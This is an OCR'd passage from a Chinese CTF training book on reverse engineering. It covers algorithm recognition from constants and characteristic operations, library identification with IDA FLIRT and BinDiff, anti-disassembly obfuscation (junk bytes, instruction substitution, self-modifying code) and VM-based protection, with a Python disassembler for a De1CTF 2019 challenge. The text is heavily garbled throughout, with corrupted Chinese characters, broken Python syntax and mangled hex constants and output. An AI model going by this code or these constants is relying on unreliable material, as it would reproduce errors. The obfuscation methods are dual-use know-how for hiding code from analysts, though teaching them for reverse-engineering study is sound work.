Base64 字符 串 "ABCDEFGHDKLMNOPQRSTUVWXYZabcdefghijkImnopqrstuvwxyz0123456789+/ 字符 集 


AES 


DES 


MD5 


通过 这 种 简单 的 识别 法 ， 许 多 开发 者 为 各 种 分 析 工 具 开 发 了 常量 查找 插件 ， 如 IDA 的 FindCrypt、 pF 

| 

的 KANAL 等 ， 在 可 执行 文件 的 分 析 中 非常 方便 。 图 ?5-4-1 展 示 的 是 使 用 FindCrypt 皇 件 对 一 个 使 用 了 
AES (Rijndael) 和 MD5 算 法 的 程序 进行 分 析 的 结果 。 


显然 ， 对 这 种 分 析 方 法 的 对 抗 是 非常 简单 的 ， 即 故意 对 这 些 音量 进行 修改 。 因 此 ， 特 征 值 识别 只 能 人 
为 一 种 快速 判断 的 手段 ， 做 出 判断 后 ， 还 需要 进行 算法 复 现 或 动态 调试 ， 来 验证 算法 的 判断 是 否 
确 。 


6\x00d\x00e\x004\x005\x002\x007\x008\x001\x00£\x00£** 
a\xO0a\x003\x003\x00£\x00d\x00b*… 


“6\x007\x009\x005\x004\x002\x006\x003\x002\x00b\x004… 
“ \xO1#E 

“ \x89\xab\xed\xef 

“ \xfe\xde\xba\x98’ 

“vyT2\x10" 

“x\xa4j\xd7 

“elw{\xf2ko\xe50\xOl e+*\xfe\xd?7\xabv\xca\x82\xc9} \xfar" 
“elw{\xf2ko\xe50\xOle*\xfe\xd?7\xabv\xca\x82\xc9} \xfa** 


5.4.2 特征 运算 识别 


当 特 征 值 不 足以 识别 出 算法 时 ， 我 们 可 以 深入 二 进 制 文件 内 部 ， 通 过 分 析 程 序 是 否 使 用 了 某 些 特征 运 
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算 来 推测 程序 是 否 使 用 了 某 些 算法 。 表 5-4-2 给 出 了 CTF 首 向 工程 题目 中 常见 算法 的 特征 运算 。 
表 5-4-2 


明 
i=(i+ 1) % 256; 


j=0+ sl]) 入 256; 3 日 由 矶 
swap(s[i], sD)); 流 密 钥 生成 


= 十 全 [ 订 十 ki dW 6 256: 
ape s[i]); S 意 变 换 
循环 256 次 


b2 = ((cl & 0x3) << 4) |(c2 >> 4): 

b3 = ((c2 & OxF) << 2) |(c3 >> 0); 

bd = c3 & Ox3F; 

((x << +kx) (y+ sum) * ((y >> 5) + ky) 轮 函 数 

(XY)|( ~) RZ) F 函数 

I G 函数 
H 函数 
1 函数 


8 位 变 6 位 


xD] = s[I[O+D) % 4] 

循环 4 次 

s[i]0] = x0j] 行 称 位 
循环 4 次 

整体 循环 4 次 


Feistel 结构 


特征 运算 识别 也 是 一 种 快速 判断 的 方法 ， 需 要 经 过 动态 调试 或 算法 复 现 等 手段 确认 后 才能 下 定论 。 


5.4.3 第 三 万 库 识 别 


为 了 提高 编程 效率 ， 对 于 一 些 常 用 的 算法 ,很 多 人 会 选择 使 用 现成 的 库 ， 如 系统 库 或 第 三 方 库 。 对 
动态 链接 的 库 ， 函 数 名 的 符号 信息 可 以 被 轻易 地 识别 ;而 对 于 静态 链接 的 第 三 方 库 来 说 ， 识 别 这 些 信 
乱 则 比较 困难 。 本 节 介 绍 在 IDA 中 识别 第 三 方 库 的 方法 。 


1. 字符 串 识别 


很 多 第 三 万 库 会 将 版 权 信 息 和 该 库 使 用 的 其 他 字符 串 (如 报错 信息 等 ) 以 字符 串 的 形式 写 入 库 中 。 在 
静态 编译 时 ， 这 些 字 符 串 会 被 一 并 放 入 二 进 制 文件 。 通 过 寻找 这 些 字符 串 ， 可 以 快速 判断 使 用 了 哪些 
第 三 方 库 ， 以 便 进一步 分 析 。 图 ?-4-2 是 通过 字符 串 信 息 判 断 某 程序 使 用 了 MIRACL 库 的 例子 。 


No modulus defined'\n 
i modulus ‘n 


I/0 buffer pre pent 


Flash to double conversion failure\n 


2 .函数 签名 识别 


有 时 ， 确 定 了 程序 所 使 用 的 库 后 ， 还 需要 进一步 识别 具体 的 函数 。 本 书 在 前 面 章 节 中 简要 介绍 了 如 位 
使 用 IDA 的 签名 识别 功能 识别 C 语 言 运行 库 函 数 ， 实 际 上 这 个 功能 不 仅 能 对 C 语 言 的 运行 库 进 行 识别 
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mE Y=]= :ES | YE EN 
以 通过 对 应 签名 库 快速 匹配 冰 数 名 、 参 数 等 信息 。IDA 中 上 自 带 了 很 多 除 C 语 言 运行 库 以 外 的 常见 库 的 签 
名 文件 ， 如 Visual C++MFC 库 等 。 


读者 可 以 使 用 前 面 介绍 的 方式 加 载 尔 数 签名 ， 也 可 以 在 IDA 文 件 菜单 中 选择 “Load File 一 FLIRT e: 
! 
file”， 出 现 的 内 容 见 图 5-4-3 和 图 5-4-4.。 s 


Borland Visual Component Library & Packages 
Borland 5.0x MFC adaptation 


ilder 5 runtime 
BDS 2005-2007 and Delphi6-7 Visual Component Library 


: :ios_base: :copyfmt(kstd': :io0os base c… 
: :locale: :operator=(std: :locale cor… 
:ios base: :exceptions(int) 

: :10s base: :iwordlint) 

: :10s base: :pwordlint) 

::10s base::imbuelstd: :locale const*** 
::10s base: :register callback(void … 
‘105s base:: Fnarray:: Fnarraylint,"** 
: :i0os base:: ios base(void) 

: :ios base:: Callfns(std: :io0os base:…。 
‘:10s base:: Findarr (lint) 

: :ios base:: Iosarray:: Iosarray(in… 
:ios_base:: Addstdtvoid) 

:ios_base::_ Init(void) 

:ios_base::_ Tidy(void) 


图 5-4-4 
如 果 IDA 没 有 预 置 需 要 识别 的 库 函 数 签名 ， 那 么 可 以 在 网 上 查找 相应 的 签名 库 ， 如 https://github. 
/pushOebp/sig-database 和 https://github.com/Maktm/FLIRTDB 等 ， 也 可 以 自 己 利用 IDA 
中 提供 的 FLAIR 工 具 ， 根 据 已 有 的 .a、.lib 等 静态 库 文 件 目 己 创建 一 份 签名 ， 放 入 sig 文 件 夹 ， 然 后 
在 IDA 中 加 载 。 关 于 FLAIR 工 具 的 使 用 请 读者 自行 查阅 相关 资料 。 


3. 二 进 制 比 对 识别 


由 于 编译 环境 等 各 种 情况 的 差异 ， 签 名 有 时 无 法 完全 匹配 库 函 数 。 即 使 编译 环境 有 一 定 区 别 ， 使 用 同 
一 个 库 编译 的 二 进 制 文 件 中 的 库 消 数 也 会 存在 许多 相同 之 处 。 如 果 能 够 确定 程序 编写 者 使 用 了 某 个 
知 库 ， 并 且 我 们 能 够 获得 一 份 含有 符号 县 同样 使 用 了 该 库 的 静态 编译 二 进 制 文件 ， 我 们 便 可 以 利用 二 
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进 制 比 对 的 方法 来 具体 地 确定 每 个 库 函 数 。 


二 进 制 比 对 的 划 用 工具 是 BinDiff (https://www.zynamics.cormm/bindiff.html) ， 芋 最 包 白 _ 
na 
开发 ， 后 被 Google 收 购 ， 并 被 改 为 免费 软件 。 该 工具 既 可 以 独立 使 用 ， 也 可 以 作为 IDA 的 揪 件 全 


用 ,功能 非常 强大 。 


= E20 :3 DD Cd Ea 1 Ea 
个 文件 的 IDB， 稍 等 片刻 即 可 看 到 比 对 结果 ， 见 图 5-4-5。 








图 5-4-5 
比 对 的 结果 中 会 显示 两 个 函数 的 相似 度 、 变 动 和 各 目的 函数 名 ， 双 击 即 可 具体 跳 转 到 某 个 函数 。 如 果 
能 够 人 工 确定 某 两 个 函数 的 确 是 相同 的 ， 那 么 可 以 利用 快捷 荣 单 将 函数 进行 重 命名。 一 般 情况 下 ， 如 
果 比 较 结果 显示 两 个 函数 几乎 没有 改动 (Similarity 极 高 ，Change 没 有 或 只 有 1) 且 它 们 不 是 空 函数 ， 
那么 它们 有 很 大 的 可 能 是 同一 个 函数 ; 有 小 部 分 改动 的 (Similarity 在 0.9 左 右 ，Change 有 2~3 
项 ) ， 则 需要 具体 查看 之 后 再 确定 。 
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5.5 二 进 制 代码 保护 和 混 泣 


在 现实 生活 中 ， 攻 与 防 的 博弈 无 处 不 在 。 为 了 防止 自己 编写 的 二 进 制 程序 被 逆向 分 析 ， 许 多 软件 会 采 
取 各 种 手段 ， 为 程序 加 上 重重 壁垒 。 二 进 制 代 码 的 保护 手段 种 类 繁多 ， 且 运用 极其 灵活 ， 例 如 : 对 汇 
编 指令 进行 一 定 程度 的 混淆 变换 ， 可 以 干扰 静态 分 析 中 的 反 汇 编 过 程 ; 在 程序 中 穿插 各 种 反 调 试 技 
术 ， 能 有 效 地 抵御 动态 分 析 ; 对 程序 中 的 关键 算法 进行 虚拟 化 保护 ， 可 以 给 逆向 工作 者 带 来 极 大 的 阻 
力 。 这 些 保 护 手段 造就 了 逆向 工程 的 漫漫 坎坷 路 ， 本 节 将 结合 CTF 与 实际 生产 环境 中 常见 的 保护 手 
段 ， 探 讨 二 进 制 代码 保护 与 混淆 的 相关 内 容 。 


5.5.1 抵御 静态 分 析 


无 论 是 逆向 工程 中 常用 的 IDA Pro 等 工具 ， 还 是 如 Ghidra 之 类 的 新 兴工 具 ， 在 载 入 二 进 制 程序 后 ， 它 
们 首先 进行 的 工作 是 对 程序 进行 反 汇 编 : 将 机 器 码 转换 为 汇编 指令 ， 在 反 汇 编 结 果 的 基础 上 开展 进 一 
步 的 分 析 。 显 然 ， 如 果 反 汇编 的 结果 受到 干扰 ， 那 么 静态 分 析 就 会 变 得 非常 困难 。 此 外 ， 反 汇编 结果 
正确 与 否 将 直接 影响 到 诸如 Hex-Rays Decompiler 等 反 编译 工具 反 编 译 的 正确 性 。 因 此 ， 许 多 开发 者 
会 选择 对 汇编 指令 本 身 做 一 些 处 理 ， 使 得 反 编 译 器 无 法 生成 逻辑 清晰 的 伪 代 码 ， 从 而 增加 逆向 选手 们 
的 工作 量 。 


干扰 反 汇编 器 最 简单 的 方法 就 是 在 代码 中 增加 花 指令 。 所 谓 花 指令 ， 是 指 在 程序 中 完全 风 余 ， 不 影响 
程序 功能 却 会 对 逆向 工程 产生 干扰 的 指令 。 论 指令 没有 固定 的 形式 ， 泛 指 用 于 干扰 逆向 工作 的 无 用 指 
令 。 下 面 介 绍 一 段 花 指令 的 示例 (如 无 特别 说 明 ， 本 节 涉 及 的 汇编 代码 均 为 x86 32 位 汇编 ) 。 考 虑 以 
下 汇编 代码 : 


该 片段 为 常见 的 浮 数 涉 ， 反 汇编 器 经 常 以 此 作为 判断 沙 数 起 始 地 址 的 依据 ， 也 以 此 进行 栈 指针 分 配 的 


计算 。 如 果 在 其 中 加 入 一 些 互相 抵消 的 操作 ， 如 


那么 该 代码 复杂 度 明 显 提升 ， 但 实际 进行 的 操作 效果 并 没有 变化 。 此 外 ，pushfd 和 popfd 等 指令 会 
让 一 些 解析 栈 指针 的 逆向 工具 产生 错误 。 


男 一 种 常见 的 干扰 静态 分 析 的 方法 是 在 正常 的 指令 中 插入 一 个 特定 的 字 节 ， 并 在 该 字 节 前 加 入 向 该 字 
二 


节 后 的 跳 转 语句 ， 以 保证 实际 执行 的 指令 效果 不 变 。 对 于 这 一 特定 的 要 求 其 是 一 条 较 长 指令 的 
首 字 节 (如 0xE8 为 call 指 令 的 首 字 节 ) ， 揪 入 的 这 个 字 节 被 称 为 脏 字 节 。 由 于 x86 是 不 定 长 指令 

如 果 反 汇编 器 没有 正确 地 从 每 条 指令 的 起 始 位置 开 始 解析 ， 就 会 出 现 解析 错误 乃至 完全 无 法 开展 后 续 
分 析 的 情况 。 


前 文 曾经 介绍 过 线性 扫描 和 递归 下 降 这 两 种 最 具 代 表 性 的 反 汇 编 算法 。 对 于 以 OllyDBG 和 WinDBG 为 
代表 的 线性 扫描 反 汇 编 工 具 ， 由 于 它们 只 是 从 起 始 地 址 开始 一 条 一 条 地 线性 向 下 解析 ， 我 们 可 以 简单 
地 使 用 一 条 无 条 件 跳 转 指令 实现 脏 字 节 的 插入 。 对 于 前 文 的 代码 片段 ， 我 们 在 第 一 条 和 第 二 条 指令 之 
间 插 入 一 个 跳 转 指令 ， 并 且 加 入 0xE8 字 节 ， 如 下 所 示 : 
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根据 线性 扫描 反 汇编 算 法 ， 当 反 汇 编 器 解析 完 }jmp addr1 指 令 后 ， 会 紧 接 着 从 下 一 个 0xE8 开 始 进行 解 
析 ， 而 OxE8 为 call 指 令 的 起 始 字 节 ， 就 会 导致 反 汇编 器 认为 从 0xE8 开 始 的 5 字 节 为 一 条 call 指 令 ， 从 而 
让 后 续 的 指令 全 部 被 错误 解析 。 


而 对 于 以 IDA Pro 为 代表 的 递归 下 降 反 汇编 器 ， 由 于 递归 下 降 反 汇编 算法 在 遇 到 无 条 件 跳 转 时 ， 会 转 
向 跳 转 的 目标 地 址 递归 地 继续 解析 指令 ， 融 会 导致 插入 的 0xE8 字 节 直 接 铸 跳 过 。 然 而 ， 递 归 下 降 反 汇 
编 器 尽管 部 分 地 模拟 了 程序 执行 的 控制 流 过 程 ， 但 它 并 不 是 真正 运行 ， 所 以 不 能 获取 到 所 有 的 信息 。 
我 们 可 以 利用 这 一 点 ， 将 上 面 的 代码 修改 如 下 : 


即将 一 条 无 条 件 跳 转 语句 改 为 两 条 成 功 条 件 相 反 的 条 件 跳 转 语句 。 由 于 递归 下 降 反 汇编 算法 不 能 获取 
到 程序 运行 中 的 上 下 文 信息 ， 直 到 条 件 跳 转 语句 时 ， 它 会 递归 地 将 跳 转 的 分 支 与 不 跳 转 的 分 支 都 进行 
反 汇 编 。 显 然 ， 在 有 反 汇编 完 jnz 语 句 后 ， 它 不 跳 转 的 分 支 就 是 下 一 地 址 ， 从 而 使 0xE8 开 头 的 “指令 " 
被 解析 。 


在 实际 操作 过 程 中 ， 为 了 达到 更 好 的 效果 ， 往 往 会 将 这 些 跳 转 目 标 代 码 的 顺序 打 乱 ， 即 “ 乱 序 ”， 从 
而 达到 类 似 控制 流 混 淆 的 效果 。 例 如 : 


还 有 一 种 常见 的 静态 混淆 方式 是 指令 替换 ， 又 称 为 “变形 ”。 在 汇编 语言 中 ， 大 量 的 指令 都 可 以 设法 
使 用 其 他 指令 来 实现 相同 或 类 似 的 功 人 能。 例如， 函数 调用 指令 call 可 以 使 用 其 他 指令 蔡 换 ， 如 以 下 指 


心 、 
2 


可 以 蔡 换 为 如 下 代码 段 : 


push addr 
BBE 


而 函数 返回 指令 ret， 也 可 以 蔡 换 为 以 下 代码 段 : 


注意 ， 该 替换 破坏 了 ecx 寄 存 器 ， 因 此 我 们 需要 保证 此 时 ecx 没 有 正在 被 程序 使 用 ， 在 实际 操作 中 ， 可 
以 根据 程序 的 上 下 文 情 况 自由 调整 。 在 CTF 中 ， 出 题 人 通常 选择 替换 涉及 函数 调用 与 返回 的 指令 ， 如 
上 述 call、ret 等 ， 这 样 可 以 导致 IDA Pro 等 工具 解析 出 的 函数 地 址 学 围 与 调用 关系 出 现 错误 ， 从 而 干 


下 面 给 出 两 个 在 CTF 中 出 现 过 的 使 用 相关 混淆 手段 的 示例 。 图 5-5-1 使 用 了 条 件 相反 的 跳 转 指令 ， 并 在 
其 后 插入 一 个 脏 字 节 ， 从 而 达到 了 干扰 IDA 静 态 分 析 的 目的 。 图 中 跳 转 的 目标 地 址 为 402669+1， 但 
从 402669 开 始 解析 了 指令 。 对 于 这 种 情况 ， 只 需 在 IDA 中 先 将 402669 开 始 地 址 的 内 容 设 为 数据 ， 

再 将 402669+ 1 开始 地 址 的 内 容 设 为 代码 ， 就 可 以 正确 地 解析 这 一 段 内 容 。 


jz short near ptr 
jnz short near ptr 


; CODE XREF: ,text:0604026651] 
; .text:004026671j 
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3 
eax, eax 


图 ?-5-2 使 用 了 指令 蔡 换 ， 将 直接 向 下 的 跳 转 改 为 一 个 call 指 令 加 上 枝 指 针 的 移动 操作 ， 由 于 call 指 令 
会 将 下 条 指令 的 EIP 压 入 栈 中 ， 目 标 地 址 便 使 用 了 一 条 add esp，4 指 令 来 实现 栈 平衡 。 因 为 使 用 了 call 
虽 令 ，IDA 会 将 call 的 目标 地 址 误 识 别 为 一 个 函数 首 地址 ， 从 而 造成 函数 地 址 范围 的 错误 识别 。 对 于 这 
种 情况 ， 首 先 需 要 将 此 处 的 指令 改 回 直接 向 下 的 跳 转 ， 表 在 IDA 中 重新 定义 消 数 的 地 址 范围 ， 才 能 达 
到 正确 的 解析 效果 。 


; CODE XREF: sub 462722+19fp 


另 一 种 常见 的 抵御 静态 分 析 的 手段 是 代码 自修 改 (Self-Modifying Code，SMC) 。3M( 融 是 程序 
在 执行 过 程 中 ， 将 自己 的 可 执行 代码 进行 修改 并 执行 的 手段 ， 能 让 真正 执行 的 代码 在 静态 分 析 中 不 出 
现 ， 以 此 增加 逆向 的 难度 。SMC 在 CTF 中 极为 常见 ， 如 碗 类 软件 / 泛 使 用 。 一 般 , 待 3MC 的 代码 在 
等 工具 中 会 被 识别 为 数据 ， 但 会 出 现 将 该 数据 地 址 当 作 函数 指针 并 进行 函数 调用 的 操作 ， 见 图 5-5-3 
和 图 5-5-4。 


if ( v6 == 125 ) 
fnP te ii br 3 
byte 414C3C[i] “= Gx7Du; 
v3 = byte 414C3C; 
((void ( cdecl x)(char x¥*, void x*))byte 418C3C)(&u3，&gunk 184BEB) ; 
result = 8; 


-data: 0060414C3G ; char 
-data: 86414C3C , 
-data: 6414C3C 
-data: 0414C3D 
-data: 0414C3E 
-data: e414C3F 
-data: 414C408 
-data: a14C41 


-data: 14C45 
-data: de14C46 
-data: 6414C47 


图 5-5-4 


这 种 情况 也 存在 两 种 基本 的 解决 方案 : @ 静 态 分 析 SMC 代 码 的 自修 改 流程 ， 自 行 实现 该 SMC 过 程 ， 


https://weread.qq.com/web/reader/77d32500721a485577d8eeeka5b325d0225a5bfc9e0772d 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 
并 将 代码 patch 为 真正 执行 的 代码 ， 即 可 继续 进行 静态 分 析 ; @ 使 用 动态 分 析 的 方法 ， 在 代码 已 被 解 
密 完毕 的 位 置 设置 断 点 ， 然 后 使 用 调试 器 跟踪 真正 执行 的 代码 ， 或 者 dump 已 经 解密 完毕 的 代码 ， 交 
给 IDA 进 行 静 态 分 析 。 


5.5.2 加 密 


5.3 节 介绍 了 充 的 概念 ， 并 以 UPX 为 例 讲 解 了 压缩 这 的 基础 脱 膏 方法 。 本 节 简 要 介绍 加 密 过 的 原理 ， 并 
结合 其 原理 讨论 CTF 中 经 常 出 现 的 虚拟 机 类 题 型 的 解 题 方法 。 


加 密 壳 程序 对 二 进 制程 序 的 加 密 大 体 上 可 以 分 为 数据 加 密 、 代 码 加 密 、 算 法 加 密 。 数 据 加 密 一 般 是 指 
对 程序 中 已 有 的 数据 进行 加 密 的 过 程 ， 一 般 会 在 合适 的 时 机 对 数据 进行 解密 (如 在 所 有 引用 该 数据 的 
地 方 放 置 数据 解密 逻辑 ) ; 同 理 ， 代 码 加 密 一 般 是 指 对 程序 代码 段 中 的 指令 进行 加 密 变换 的 过 程 ， 一 
般 会 等 到 真正 需要 执行 目标 代码 时 才 对 其 进行 解密 (这 个 过 程 运用 到 了 3M5 技 术 ) 。 一 般 ， 加 过 程序 
往往 会 将 这 两 种 加 密 方式 与 RSA 等 成 熟 密 码 学 算法 相 结合 ， 实 现 对 软件 “授权 系统 ”及 其 关键 数据 的 
保护 ， 例 如， 有 的 开发 者 不 会 选择 单独 编译 已 去 除 关 键 功能 的 demo 版 本 应 用 程序 给 用 户 试 用 ， 而 是 
选择 使 用 加 密 壳 程序 对 关键 功能 进行 依赖 授权 密 铀 的 加 密 保护 ， 这 样 当 用 户 未 购买 正确 密 钥 时 ， 他 无 
法 使 用 软件 的 关键 功能 、 访 问 其 关键 数据 。 许 多 加 密 这 软件 便 提 供 了 这 样 的 功能 ， 以 供 开 上 友 者 使 用 。 


CTF 中 更 弟 见 的 加 密 技 术 是 算法 加 密 。 算 法 加 密 更 仙 重 算法 的 混淆 、 模 糊 与 隐藏 ， 其 中 最 弟 见 的 方式 
便 是 虚拟 机 保护 。 虚 拟 机 (Virtual Machine，VM) 保护 的 大 范围 使 用 最 早出 现在 加 密 壳 软件 中 ， 是 
一 些 加 密 壳 的 最 强 保 护 手段 ， 其 中 最 具 代 表 性 的 是 VMProtect。VMProtect 除 了 提供 常规 的 数据 加 
密 、 代 码 加 密 和 其 他 反 调 试 等 功能 ， 还 能 在 汇编 指令 层面 对 程序 逻辑 进行 虚拟 化 ， 将 开 友 者 指定 的 代 
码 段 中 所 有 的 汇编 指令 转变 为 自行 编写 的 一 套 指 令 集 中 的 指令 ， 并 在 实际 执行 时 由 目 行 编写 的 虚拟 机 
执行 器 进行 模拟 执行 。 注 意 ， 这 与 YMWare 等 虚拟 机 程序 并 非 同 一 个 概念 。VMWare 等 虚拟 机 程序 规 
Ea) =|: NS I DY 
相对 较 小 ， 目 的 是 尽 可 能 地 对 原始 程序 代码 、 算 法 逻辑 进行 混淆 、 模 糊 和 隐藏。 


基于 虚拟 机 保护 的 加 密 壳 上 友 展 至 今 ， 已 经 能 达到 极其 复杂 的 加 密 混 清 效 果 ， 要 对 保护 过 后 的 程序 进行 
还 原 已 经 变 得 极其 困难 ， 并 且 将 耗费 大 量 时 间 。 在 CTF 中 ， 我 们 经 常 看 到 的 VM 实 际 上 是 简化 、 抽 象 后 
的 ， 一 般 不 会 针对 x86、x64 等 真实 CPU 的 汇编 揭 令 进行 虚拟 化 。 一 般 ， 出 题 人 会 针 题目 中 的 校 验算 法 
设计 一 套 精 简 的 指令 集 。 例 如 ， 要 实现 一 个 移 位 密码 可 能 需要 用 到 加 、 模 等 运算 ， 于 是 便 可 以 设计 一 
个 包含 加 、 模 等 运算 指令 的 指令 集 ， 将 校 验 算法 用 目 己 设计 的 指令 集中 的 指令 实现 ， 表 将 其 ;汇编 为 该 
指令 集 的 机 器 码 (俗称 虚拟 字 节 码 ) ， 最 后 将 这 些 字 节 人 码 交 给 编写 好 的 虚拟 CPU 执行 函数 进行 执行 。 
要 对 这 类 题目 进行 逆向 ,我 们 可 以 对 其 虚拟 CPU 执 行 函 数 进 行 逆 向 ， 还 原 出 该 虚拟 架构 的 

后 编写 反 汇编 代码 对 虚拟 字 节 码 进行 反 汇编 ， 最 后 根据 反 汇 编 的 结果 ， 分 析 题 目 真 正 的 校 验 算法 ， 获 
得 flag。 


下 面 以 De1CTF 2019 中 的 逆向 题 signal_ vm_de1ta 为 例 ， 讲 解 该 类 题 的 解决 方法 。 该 是 本 刁 为 一个 
下 的 可 执行 程序 ， 通 过 前 置 逆 同 分 析 工 作 ， 可 以 友 现 它 不 太 单 规 地 通过 signal、ptrace 等 机 制 实 

现 了 一 个 VM 执行 溺 数 ， 由 于 其 主 逻 辑 代码 较 多 ， 本 忆 不 对 其 进行 展示 。 我 们 需要 的 是 根据 ptrace 的 

原理 将 这 部 分 代码 的 多 辑 理 清楚 ， 然 后 还 原 出 该 虚拟 架构 的 指令 集 ， 并 编写 肥 汇 编 代码 。 逆 向 完 
部 分 的 逻辑 后 ， 我 们 在 赛 期 内 使 用 Python 编 写 了 如 下 反 汇编 脚 本 : 光 


NUX 


flels 


def run_disasm(): 
def byte(ip, n): return code[ip+n] 
def dword(ip): return code[ip] + code[ip+1]*0x160 + \ 
code[ip+2]*9x19996 + code[ip+3]*9x1699960 
code = [2864, 1, 7, 0, 86, 0, 8, 284, 1, 8, 1, 8, 8, 69， 06, 6 ... ] 
disasm = "'" 


vip=0 
while vip < len(code): 
Vv11 = 0 


cur_ip = vip 
if byte(cur_ip, 0) == 9xcc: # case 9x5 
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if bytetcur_ip, 1) == 1: 
v1l1 = dword(cur_ip+3) 
vip += 7 

else: 
v1l1 = byte(cur_ip, 3) 
Vip += 4 


if byte(cur_ip, 1) == 1: 
disasm += ("label_%d:\t' % cur_ip) + ‘reg[%d] = %d;\n' % (byte(cur_ip, 2), v11) 
elif byte(cur_ip, 1) > 1: 
if byte(cur_ip, 1) = 
disasn += ('label.’ " % cur_ip) + 'reg[%d]=men[reg[%d]];\n’ % (byte(cur_ip,2), v11) 
@lif byte(cur_ip, 1) == 6x20: 
disasm += ("label_%d:\t' % cur_ip) + 'mem[reg[%di]] = reg[%d];\n' % (byte(cur_ip, 2), v11) 
elif byte(cur_ip, 1) == @: 
disasm += ('label_%d:\t' % cur_ip) + ‘reg[%d] = reg[%d];\n’ % (byte(cur_ip, 2), v11) 
continue 
if byte(cur_ip, 0) == 6: # case Oxy 
v19 = byte(cur_ip, 2) 
V14 = ‘reg[%d]' % byte(cur_ip, 3) 
if v19 == 1: 
vip += 8 
vill = dword(cur_ip + 4) 
elif v19 == 9: 
vip += 5 
Vill = 'reg[%d]' % byte(cur_ip, 4) 
V19 = byte(cur_ip，1) 
if v10 == 9; 
VI4 ' +="' + str(vi1) 
elif v19 = 
Vld +="' + str(vi1) 
elif v19 = 
str(vll) 


str(v11) 


str(v11) 
elif v16 == 5: 
v14 += ' |= str(vi1) 
elif v19 == 6; 
vld += 1! + str(v11) 
etif v19 == 
Vly += “= ' + str(v11) 
etif v19 == 8; 
VI4 += ' <<= ' + str(v11) 
elif v19 == 9: 
Vld += ' >>= ' + str(v11) 
disasm += ('label_%d:\t" % cur_ip) + vd + ';\n' 
continue 
if byte(cur_ip, 2) == Oxf6 and byte(cur_ip, 3) == Oxf8: # case 9x8 
if byte(cur_ip, 4) == 1: 
Vll = dword(cur_ip+6) 
v6 = "reg[%d] - %d' % (byte(cur_ip, 5), v11) 
disasm += ("label_%d:\t' % cur_ip) + 'g_cmp_result = %s; 
vip += 10 
elif byte(cur_ip, 4) == 96: 
vll = byte(cur_ip, 6) 
v6 = 'reg[%d] - reg[%d]' % (byte(cur.ip, 5), v11) 


disasm += ('label_%d:\t' % cur_ip) + 'g_cmp_result = %s;\n' % v6 
vip += 7 
continue 
if byte(cur_ip, 6) == © and byte(cur_ip, 1) == 0: # case 
arg = dword(cur_ip+3) 
vip += 7 
if byte(cur_ip, 2) == 0: 
disasm += ('label_%d:\t' % cur_ip) + 'goto label_%d;\n' % ((cur_ip + arg) & 9xffffffff) 
elif byte(cur_ip, 2) == 1: 
disasm += ('label_%d:\t' % cur_ip) + \ 
'if (g_cmp_result goto label_%d;\n' % ((cur_ip + arg) & 9xffffffff) 
elif byte(cur_ip, 2) == 2: 
disasm += ('label_%d:\t' % cur_ip) + \ 
‘if (g_cmp_result!=0) goto label _%d;\n' % ((cur_ip + arg) & 9xffffffff) 
elif byte(cur_ip, 2) == 3: 
disasm += ('label_%d:\t' % cur_ip) + \ 
'if (g_cmp_result>0) goto label_%d;\n' % ((cur_ip + arg) & Oxffffffff) 
elif byte(cur_ip, 2) == 4: 
disasm += ('label_%d:\t' % cur_ip) + \ 
'if (g_cmp_result>=8) goto label_%d;\n' % ((cur_ip + arg) & gxffffffff) 
elif byte(cur_ip, 2) == 5: 
disasm += ('label_%d:\t' % cur_ip) + \ 
‘if (g_cmp_result<8) goto label_%d;\n' % ((cur_ip + arg) & 9xffffffff] 
elif byte(cur_ip, 2) == 6: 
disasm += ('label_%d:\t' % cur_ip) + \ 
‘if (g_cmp_result<=0) goto label_%d;\n' % ((cur_ip + arg) & 9xffffffff) 
continue 
if byte(cur_ip, 8) == 195: 
disasm += ('label_%d:\t' % cur_ip) + 'return;\n' 
vip += 1 
break 
if byte(cur_ip, ©) == 144: 
disasm += ('label_%d:\t' % cur_ip) + 'nop;\n’' 
vip += 1 
continue 
print('unknown opcode') 
exit() 
print(disasm) 
if __name__ == '__main__': 
run_disasm() 


原 题 中 虚拟 机 执行 立 数 的 逻辑 ， 从 而 能 够 解析 庶 拟 字 书 码 ， 并 将 其 反 汇编 为 更 易 阅 读 的 


原 了 
运行 该 脚本 ， 我 们 能 够 得 到 以 下 输出 : 


LabeL_g: reg[7] 

label_7: reg[8] = 1; 
label_14: goto LabeL_695; 
label_21: reg[4] = 9; 
LabeL_28: reg[5] 
LabeL_35: reg[6] = 
LabeL_42: reg[3] 

LabeL_49 : goto LabeL_244; 


LabeL_56: reg[6] = reg[q]; 

label_60: reg[6] += 1; 

label_68; reg[6] *= reg[4]; 

label_73; reg[6] >>= 1; 

label_81: reg[2] = reg[9]; 

Tabel_85; reg[6] = reg[5]; 

Labet_89: reg[6] += reg[2]; 

label_94: reg[2] = reg[9]; 

label_98; reg[6] = 384; 

LabeL_165: reg[6] += reg[2]; 
Uabel_110; reg[1] = men[reg[9]]; 
LabeL_llu: reg[6] = reg[3]; 

LabeL_l18: reg[2] = reg[9]; 

Ulabel_122; reg[9] = 128; 

LabeL_129: reg[6] += reg[2]; 
LabeL_134: mem[reg[9]] = reg[1]; 
LabeL_138: reg[9] = reg[3]; 

label_142; reg[2] = reg[9]; 

label_146: reg[6] = 128; 

LabeL_153: reg[9] += reg[2]; 
LabeL_158: reg[6] = mem[reg[9]]; 
label_162: reg[6] = reg[9]; 

LabeL_166: reg[6] += reg[9]; 
LabeL_171: reg[9] = 191; 

label_178: reg[6] -= reg[3]; 
LabeL_183: reg[2] = reg[9]; 

LabeL_187: reg[6] = 9; 

label_194: reg[6] += reg[2]; 
LabeL_199: reg[9] = men[reg[9]]; 
LabeL_263: 9_cnp_resutt = reg[9] ~ 49; 
LabeL_213: if (9_cmp_resuLt!=9) goto Labet_228; 
LabeL_229: reg[5] += 1; 

LabeL_228: reg[4] += 1; 

label_236: reg[3] += 1; 

LabeL_244: 9g_cnmp_resutt = reg[3] - 99; 
LabeL_254; if (9_cmp_resuLt<=9) goto Labet_56; 
label_261: reg[9] = reg[6]; 

LabeL_265: g_cmp_resutt = reg[6] - reg[7]; 
label_272: if (gcmp_result<=0) goto label_374; 
LabeL_279: reg[6] = reg[6]; 

LabeL_283: reg[7] = reg[9]; 

LabeL_287: reg[3] = 9; 

LabeL_294: goto label_357; 

LabeL_361: reg[9] = reg[3]; 

LabeL_365: reg[2] = reg[9]; 

label_389: reg[6] = 128; 

LabeL_316: reg[9] += reg[2]; 
label_321: reg[1] = men[reg[9]]; 
LabeL_325: reg[6] = reg[3]; 

Ulabel_329: reg[2] = reg[9]; 

